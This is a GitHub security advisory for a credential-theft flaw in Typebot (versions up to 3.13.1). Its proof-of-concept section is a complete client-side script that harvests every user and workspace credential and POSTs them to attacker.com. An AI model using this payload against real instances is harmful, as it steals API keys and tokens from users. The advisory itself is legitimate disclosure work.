Skip to content

Credential Theft via Client-Side Script Execution and API Authorization Bypass

High
baptisteArno published GHSA-4xc5-wfwc-jw47 Jan 22, 2026

Package

packages/embeds/js/src/features/blocks/logic/script/executeScript.ts (typebot.io)

Affected versions

<=3.13.1

Patched versions

3.13.2

Description

Summary

Client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The /api/trpc/credentials.getCredentials endpoint returns plaintext API keys without verifying credential ownership

Details

The Script block with "Execute on client" enabled runs arbitrary JavaScript in the victim's browser with their authenticated session. This allows API calls on their behalf.

The /api/trpc/credentials.getCredentials endpoint returns plaintext credentials:

GET /api/trpc/credentials.getCredentials?input={"json":{"scope":"user","credentialsId":"cm6sofgv200085ms9d2qyvgwc"}}

Response:
{
  "result": {
    "data": {
      "json": {
        "name": "My OpenAI Key",
        "data": { "apiKey": "sk-proj-abc123...xyz789" }
      }
    }
  }
}

The endpoint only checks if you're authenticated, not if you own the credential. Anyone can steal credentials by calling this with different IDs.

Vulnerable file: packages/embeds/js/src/features/blocks/logic/script/executeScript.ts

PoC

Here's how to reproduce:

  1. Create a new typebot in the Builder
  2. Add a Script block and enable "Execute on client"
  3. Paste this code:
const exfil = async () => {
  const data = { credentials: [] };

  const list = await fetch(
    "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" +
      encodeURIComponent(JSON.stringify({ json: { scope: "user" } })),
    { credentials: "include" }
  );
  const creds = (await list.json()).result?.data?.json?.credentials || [];

  for (const c of creds) {
    const full = await fetch(
      "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" +
        encodeURIComponent(
          JSON.stringify({ json: { scope: "user", credentialsId: c.id } })
        ),
      { credentials: "include" }
    );
    const d = await full.json();
    data.credentials.push({
      name: d.result.data.json.name,
      type: c.type,
      apiKey: d.result.data.json.data.apiKey,
      fullData: d.result.data.json.data,
    });
  }

  const ws = await fetch(
    "https://app.typebot.io/api/trpc/workspace.listWorkspaces",
    { credentials: "include" }
  );
  const workspaces = (await ws.json()).result.data.json.workspaces;

  for (const w of workspaces) {
    const wsList = await fetch(
      "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" +
        encodeURIComponent(
          JSON.stringify({ json: { workspaceId: w.id, scope: "workspace" } })
        ),
      { credentials: "include" }
    );
    const wsCreds = (await wsList.json()).result?.data?.json?.credentials || [];

    for (const c of wsCreds) {
      const full = await fetch(
        "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" +
          encodeURIComponent(
            JSON.stringify({
              json: {
                workspaceId: w.id,
                scope: "workspace",
                credentialsId: c.id,
              },
            })
          ),
        { credentials: "include" }
      );
      const d = await full.json();
      data.credentials.push({
        workspace: w.name,
        name: d.result.data.json.name,
        type: c.type,
        fullData: d.result.data.json.data,
      });
    }
  }

  await fetch("https://attacker.com/exfil", {
    method: "POST",
    body: JSON.stringify(data),
  });
};
await exfil();
  1. Share typebot with victim
  2. When victim clicks "Run" to preview, script executes
  3. All credentials exfiltrated in plaintext:
{
  "credentials": [
    {
      "name": "My OpenAI",
      "type": "openai",
      "apiKey": "sk-proj-abc123...",
      "fullData": { "apiKey": "sk-proj-abc123..." }
    },
    {
      "workspace": "Company Workspace",
      "name": "Google Sheets",
      "type": "google-sheets",
      "fullData": {
        "refresh_token": "1//0gHdP...",
        "access_token": "ya29.a0..."
      }
    }
  ]
}

Impact

All Typebot users storing credentials are affected. Attackers can steal OpenAI API keys, Google Sheets tokens, SMTP passwords, and all other stored credentials.

Example: Attacker creates a "Customer Feedback Template" and shares with 5 company employees. When they preview it, the attacker obtains the company's OpenAI key ($500+/month), Google Sheets access with customer data, and SMTP credentials.

Root causes:

  • Client-side scripts execute with victim's authenticated session
  • API returns plaintext credentials without ownership verification
  • No user warnings or consent prompts
  • Exploitable with free tier account

CWE-639 (Authorization Bypass), CWE-79 (XSS), CWE-311 (Missing Encryption)

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVE ID

CVE-2025-65098

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

Exposure of Sensitive Information to an Unauthorized Actor

The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. Learn more on MITRE.

Improper Access Control

The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Learn more on MITRE.

Missing Encryption of Sensitive Data

The product does not encrypt sensitive or critical information before storage or transmission. Learn more on MITRE.

Insufficiently Protected Credentials

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. Learn more on MITRE.

Authorization Bypass Through User-Controlled Key

The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. Learn more on MITRE.

Missing Authorization

The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Learn more on MITRE.

Credits